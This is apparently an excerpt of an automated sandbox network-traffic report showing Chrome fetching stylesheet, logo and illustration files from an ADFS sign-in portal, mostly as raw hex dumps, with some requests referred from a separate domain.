                                                      2024-04-16 11:57:14 UTC7830INData Raw: ef bb bf 2a 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 7d 0d 0a 68 74 6d 6c 2c 20 62 6f 64 79 0d 0a 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 20 2c 20 22 53 65 67 6f 65 22 20 2c 20 22 53 65 67 6f 65 55 49 2d 52 65 67 75 6c 61 72 2d 66 69 6e 61 6c 22 2c 20 54 61 68 6f 6d 61 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c
                                                      Data Ascii: * {margin:0px;padding:0px;}html, body{ height:100%; width:100%; background-color:#ffffff; color:#000000; font-weight:normal; font-family:"Segoe UI" , "Segoe" , "SegoeUI-Regular-final", Tahoma, Helvetica, Arial,


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.54975385.119.134.1684435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:14 UTC669OUTGET /adfs/portal/logo/logo.png?id=3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD HTTP/1.1
                                                      Host: federation.cgi.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:14 UTC287INHTTP/1.1 200 OK
                                                      Content-Length: 2261
                                                      Content-Type: image/png
                                                      Expires: Thu, 16 May 2024 11:57:14 GMT
                                                      ETag: 3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD
                                                      Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                      Date: Tue, 16 Apr 2024 11:57:07 GMT
                                                      Connection: close
                                                      2024-04-16 11:57:14 UTC2261INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4d 00 00 00 23 08 06 00 00 00 d1 f7 87 9a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                      Data Ascii: PNGIHDRM#tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.54975585.119.134.1684435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:15 UTC685OUTGET /adfs/portal/illustration/illustration.jpg?id=9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3 HTTP/1.1
                                                      Host: federation.cgi.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:15 UTC289INHTTP/1.1 200 OK
                                                      Content-Length: 200706
                                                      Content-Type: image/jpg
                                                      Expires: Thu, 16 May 2024 11:57:15 GMT
                                                      ETag: 9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3
                                                      Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                      Date: Tue, 16 Apr 2024 11:57:08 GMT
                                                      Connection: close
                                                      2024-04-16 11:57:15 UTC16095INData Raw: ff d8 ff e1 08 26 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 07 80 00 00 01 01 00 03 00 00 00 01 04 38 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d3 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 2d c6 c0 00 00 27 10 00 2d c6 c0 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 30 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 31 3a 30 32 3a 31 31 20 30 38 3a 34 32 3a 35 38 00 00 00 04 90 00 00 07 00 00 00 04 30
                                                      Data Ascii: &ExifMM*8(12i -'-'Adobe Photoshop 22.0 (Windows)2021:02:11 08:42:580
                                                      2024-04-16 11:57:16 UTC16384INData Raw: ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 ff d5 df e3 df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b
                                                      Data Ascii: ~{^u~{^u~{^u~{^u~{^^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{
                                                      2024-04-16 11:57:16 UTC16384INData Raw: 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd
                                                      Data Ascii: {^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~
                                                      2024-04-16 11:57:16 UTC16384INData Raw: 7c 53 a5 ec ae 01 f4 30 c8 3f e7 de 9d 4f bc 4f b0 ef f0 f3 a6 ca 7e cd ce d0 ff 00 82 5e b8 8d f9 d7 85 1a 4f f4 9d d5 5e 34 1a 99 cf 6b 75 c8 55 04 80 0b 31 ca 58 72 40 e4 fb a4 9b 0e ed 0c 66 49 6d 66 55 1c 49 89 c0 1e 59 25 7d 4f 57 1f 78 5f 63 4b 05 1c e1 b3 92 70 00 dc 6d 89 3f 97 89 d2 9e 39 22 9a 28 2a 29 aa a9 2a e9 6a e9 a9 ab 28 eb 28 6a e9 ab e8 6b 68 ab 20 5a 9a 3a da 1a fa 17 92 19 e1 9a 37 59 22 9a 19 19 1d 48 65 62 08 3e cb da 02 8c 51 c1 04 71 1d 49 db 66 f5 b6 ef 5b 7c 3b b6 d1 70 97 56 b7 08 24 8a 68 9c 3c 72 23 65 5d 1d 49 56 53 e4 41 20 f5 cb 9f f5 43 fd e7 de bc 25 ff 00 57 fc 57 4b bc 71 fe a3 d7 b9 ff 00 54 3f de 7d fb c2 5f f5 7f c5 75 ef 1c 7f a8 f5 ee 7f d5 0f f7 9f 7e f0 97 fd 5f f1 5d 7b c7 1f ea 3d 7b 9f f5 43 fd e7 df bc 25
                                                      Data Ascii: |S0?OO~^O^4kuU1Xr@fImfUIY%}OWx_cKpm?9"(*)*j((jkh Z:7Y"Heb>QqIf[|;pV$h<r#e]IVSA C%WWKqT?}_u~_]{={C%
                                                      2024-04-16 11:57:16 UTC16384INData Raw: 0e 10 af 88 d5 c1 5a 37 f6 60 8c 71 38 3c 78 74 c5 f1 ae a3 e5 d7 67 f5 4e da c0 e2 37 76 d7 e9 ec 46 c0 39 5e 9c c8 50 ec ed a2 9d bd db b4 f9 5e a6 c9 3e c4 ab 6d cb da 9d 94 94 9b 7e 2a ea 88 a8 e1 ac 32 50 6c d6 1e 39 a3 70 5f 50 f6 de e7 6f 67 6d 70 67 dd a4 51 24 80 49 a6 32 74 51 f2 28 cc 35 37 db a1 73 ea 33 d2 9d a6 f2 ee ee dc 41 b2 42 e6 38 d8 a0 69 40 d5 da 72 0a 46 da 54 1a 8c 19 98 85 a7 03 80 65 a8 7f 97 94 5b fe 68 2a fb 83 2f bf fb 9a ac 05 91 87 74 76 3e e9 df 18 ab 82 59 da 2e b8 c4 c9 8c da 90 a9 b9 2d 1c 78 30 9f 8d 36 f6 49 2f 32 ed 36 98 b6 88 12 31 52 2b ff 00 1e d5 c7 ce 82 9f 2e 8f a0 e5 8d fa f0 56 e6 62 8a 68 7b 68 bc 38 65 34 9c 79 55 89 f5 27 8f 4a 9e c7 f8 a3 d2 58 2e a8 de 5d 45 43 b8 7a ff 00 ae e7 dd 1b 4b 31 82 c6 e1 36
                                                      Data Ascii: Z7`q8<xtgN7vF9^P^>m~*2Pl9p_PogmpgQ$I2tQ(57s3AB8i@rFTe[h*/tv>Y.-x06I/261R+.Vbh{h8e4yU'JX.]ECzK16
                                                      2024-04-16 11:57:16 UTC16384INData Raw: c4 3e 25 c5 ec ce b6 db 85 ed ba 8c cc f3 b8 d1 b1 6c a2 83 44 8c ab 3c eb 41 6b 11 73 e2 b7 1a 6d be b2 6e 0d b3 59 91 a6 86 bd 72 9b d1 b6 6e e2 97 36 b5 9b be 9a ab 37 9d c0 d5 63 a9 f0 5b e7 3b b6 1d 2a 37 56 62 37 31 08 f6 36 d7 8c 61 b1 ea 16 9e b6 4b b3 30 3f 16 44 ee 16 f7 17 8a 1b c4 b8 30 4f e2 9f 1c 34 92 c3 24 62 3b d9 e3 a1 be b8 07 48 1b 5d 88 5d be d8 76 4c c4 e4 06 e4 dd 5b f7 55 ed a5 93 b4 66 1b 31 77 6e b0 69 b4 65 86 19 e2 90 cf 63 05 ca b2 6d 96 8c ba eb bd 6e 6c 77 2b c2 4c b6 a9 80 0b a7 56 ec 4d d3 b2 37 ae 63 68 f5 56 19 37 16 df cd e3 9a 97 7d 26 e4 cc c3 86 8f 60 55 aa 1d 3b 6f 7a ee 5d 9d 07 91 63 ab a8 79 2b 32 3b 2b 6d e4 95 cc 5e 2a 4a ea 9b a3 37 bb 72 fe c5 b8 ec 9b b4 9b 27 27 c0 27 82 55 22 e5 a5 91 63 4b 26 a5 44 53 4b
                                                      Data Ascii: >%lD<AksmnYrn67c[;*7Vb716aK0?D0O4$b;H]]vL[Uf1wniecmnlw+LVM7chV7}&`U;oz]cy+2;+m^*J7r'''U"cK&DSK
                                                      2024-04-16 11:57:16 UTC16384INData Raw: 44 2a a0 34 74 69 1c eb a1 e8 65 ef 5c 8d 16 67 b6 f7 b6 63 1b 90 83 2b 8e cb d7 d0 e5 71 f9 3a 6a dd 87 5f 4f 91 a0 c8 e1 29 6b 28 ab 62 ad ea fa 7a 4d b7 20 92 27 57 d5 81 a5 86 83 9b 53 46 91 05 50 39 b0 b5 55 b4 45 45 01 45 68 02 ba 80 2a 69 41 21 67 03 d0 39 2d ea 49 eb ad 5e ce de 13 ed 47 2e 92 4b 1f dd f6 d5 24 82 6b e1 8a d4 a8 0a 4d 78 90 00 af 00 3a 09 7f e4 2f f7 91 ff 00 14 f6 af e9 cf a7 f2 ea 48 fa b3 d7 bf e4 2f f7 91 ff 00 14 f7 ef a7 3e 9f cb af 7d 59 eb df f2 17 fb c8 ff 00 8a 7b f7 d3 9f 4f e5 d7 be ac f5 ef f9 0b fd e4 7f c5 3d fb e9 cf a7 f2 eb df 56 7a f7 fc 85 fe f2 3f e2 9e fd f4 e7 d3 f9 75 ef ab 3d 7b fe 42 ff 00 79 1f f1 4f 7e fa 73 e9 fc ba f7 d5 9e bd ff 00 21 7f bc 8f f8 a7 bf 7d 39 f4 fe 5d 7b ea cf 5e ff 00 90 bf de 47 fc
                                                      Data Ascii: D*4tie\gc+q:j_O)k(bzM 'WSFP9UEEEh*iA!g9-I^G.K$kMx:/H/>}Y{O=Vz?u={ByO~s!}9]{^G
                                                      2024-04-16 11:57:16 UTC16384INData Raw: 54 ff 00 51 fe df df bf 79 0f 53 d7 be 87 e5 fe af d9 d7 bf 8a 9f ea 3f db fb f7 ef 21 ea 7a f7 d0 fc bf d5 fb 3a f7 f1 53 fd 47 fb 7f 7e fd e4 3d 4f 5e fa 1f 97 fa bf 67 5e fe 2a 7f a8 ff 00 6f ef df bc 87 a9 eb df 43 f2 ff 00 57 ec eb df c5 4f f5 1f ed fd fb f7 90 f5 3d 7b e8 7e 5f ea fd 9d 7b f8 a9 fe a3 fd bf bf 7e f2 1e a7 af 7d 0f cb fd 5f b3 af 7f 15 3f d4 7f b7 f7 ef de 43 d4 f5 ef a1 f9 7f ab f6 75 ef e2 a7 fa 8f f6 fe fd fb c8 7a 9e bd f4 3f 2f f5 7e ce bd fc 54 ff 00 51 fe df df bf 79 0f 53 d7 be 87 e5 fe af d9 d7 bf 8a 9f ea 3f db fb f7 ef 21 ea 7a f7 d0 fc bf d5 fb 3a f7 f1 53 fd 47 fb 7f 7e fd e4 3d 4f 5e fa 1f 97 fa bf 67 5e fe 2a 7f a8 ff 00 6f ef df bc 87 a9 eb df 43 f2 ff 00 57 ec eb df c5 4f f5 1f ed fd fb f7 90 f5 3d 7b e8 7e 5f ea fd
                                                      Data Ascii: TQyS?!z:SG~=O^g^*oCWO={~_{~}_?Cuz?/~TQyS?!z:SG~=O^g^*oCWO={~_
                                                      2024-04-16 11:57:16 UTC16384INData Raw: 82 dc c4 3c 59 0e 84 fe 26 21 45 7e d6 20 7c f0 4d 7a e4 45 cd d2 49 fa 29 fa 92 71 d2 a0 b3 53 d4 aa 82 7e 5c 3e d2 3a ae ff 00 95 3b 87 0b d3 7d b3 f1 f3 bd 37 f7 66 75 17 4a 65 3a 67 b1 e9 b3 99 dd bd d9 3b f3 18 9d 91 9d eb fd d9 8b 9b 63 ef bc 3e 33 a9 b6 79 c9 ee 19 64 96 82 a5 2a 52 39 e8 a2 bc b0 20 01 9e c3 db d7 9b de c1 16 de 6d 2e 2e 03 3a b5 46 90 c4 69 64 64 61 5a 55 89 25 4a 85 56 05 94 64 74 9b 6d e5 fe 68 97 77 6d c2 de d0 ac 32 c3 e1 9d 74 0c 65 8e 58 e5 89 b4 d4 85 55 54 90 48 ce c8 42 39 21 4e 7a 32 3b 8b f9 93 60 56 98 53 f5 7f 45 f6 be f7 72 88 28 f7 47 69 64 30 1f 1c 36 2d 41 6b 68 a8 8e 8f 73 ff 00 14 dd f5 11 15 21 87 8b 6d 44 5c 5b 4b 8b df d9 75 af 28 73 16 e0 da a1 b4 30 a9 fc 53 9f 0e 9f ed 28 d2 8f b1 a3 5e 97 6e 3e e2 72 56
                                                      Data Ascii: <Y&!E~ |MzEI)qS~\>:;}7fuJe:g;c>3yd*R9 m..:FiddaZU%JVdtmhwm2teXUTHB9!Nz2;`VSEr(Gid06-Akhs!mD\[Ku(s0S(^n>rV
                                                      2024-04-16 11:57:16 UTC16384INData Raw: 39 99 30 98 aa ec ed 3c d2 41 4c 6a a5 96 a0 c5 19 00 c8 ec c6 e4 fb c8 df 66 4c b6 bb 05 ec 48 74 89 27 ee 1e a3 c3 8f fc dd 70 db fb d3 a2 53 ef 17 2d b1 e2 36 55 a7 fd 97 df 0f f0 7a f5 71 14 3f c9 a7 f9 4f e3 66 fb 8a 0f e5 d7 f0 f6 96 a3 49 41 3c 5d 0f d7 e2 54 56 16 6f 1c 86 8a ea 7f c5 48 3e e6 4b 3b fb cd be 5f 1e ca 46 89 e9 4d 4a 68 69 f2 3c 47 e5 d7 2f ae ad 2d af 63 f0 6e 90 48 95 ae 93 c0 fd a3 81 fb 0d 47 52 b1 df c9 db f9 55 62 72 0b 96 c7 ff 00 2f 3f 88 74 f9 34 62 e9 5f fe 82 b6 04 b5 6b 21 e4 c8 b3 cd 44 cc 1b fd a8 1b fb 7e d7 78 dd 2c af 3f 78 da ce eb 39 ff 00 44 d4 4b ff 00 bd 1a 9f e7 d3 37 9b 5e dd 7f 66 76 fb b8 55 e0 22 86 3a 51 08 f4 d2 28 29 f2 e1 d2 f5 bf 96 4f f2 f3 65 0a df 0b 7e 36 32 81 a4 29 ea 4d 9e 55 45 ad 65 1f 6b c0
                                                      Data Ascii: 90<ALjfLHt'pS-6Uzq?OfIA<]TVoH>K;_FMJhi<G/-cnHGRUbr/?t4b_k!D~x,?x9DK7^fvU":Q()Oe~62)MUEek


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.54975785.119.134.1684435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:15 UTC435OUTGET /adfs/portal/logo/logo.png?id=3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD HTTP/1.1
                                                      Host: federation.cgi.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:15 UTC287INHTTP/1.1 200 OK
                                                      Content-Length: 2261
                                                      Content-Type: image/png
                                                      Expires: Thu, 16 May 2024 11:57:15 GMT
                                                      ETag: 3013B2477D4F66BAEB617DB660EB3146818DCFD9D6B396C4B418E49E6B862AAD
                                                      Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                      Date: Tue, 16 Apr 2024 11:57:08 GMT
                                                      Connection: close
                                                      2024-04-16 11:57:15 UTC2261INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4d 00 00 00 23 08 06 00 00 00 d1 f7 87 9a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                      Data Ascii: PNGIHDRM#tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.54975885.119.134.1684435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:17 UTC451OUTGET /adfs/portal/illustration/illustration.jpg?id=9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3 HTTP/1.1
                                                      Host: federation.cgi.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:18 UTC289INHTTP/1.1 200 OK
                                                      Content-Length: 200706
                                                      Content-Type: image/jpg
                                                      Expires: Thu, 16 May 2024 11:57:17 GMT
                                                      ETag: 9D9D353725787D2503EC8832EBCA188E379D39FDC95E12EFAE6C3247161E3AE3
                                                      Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                      Date: Tue, 16 Apr 2024 11:57:10 GMT
                                                      Connection: close
                                                      2024-04-16 11:57:18 UTC16095INData Raw: ff d8 ff e1 08 26 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 07 80 00 00 01 01 00 03 00 00 00 01 04 38 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d3 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 2d c6 c0 00 00 27 10 00 2d c6 c0 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 30 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 31 3a 30 32 3a 31 31 20 30 38 3a 34 32 3a 35 38 00 00 00 04 90 00 00 07 00 00 00 04 30
                                                      Data Ascii: &ExifMM*8(12i -'-'Adobe Photoshop 22.0 (Windows)2021:02:11 08:42:580
                                                      2024-04-16 11:57:18 UTC16384INData Raw: ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 ff d5 df e3 df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b
                                                      Data Ascii: ~{^u~{^u~{^u~{^u~{^^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{
                                                      2024-04-16 11:57:18 UTC16384INData Raw: 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd
                                                      Data Ascii: {^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~{^u~
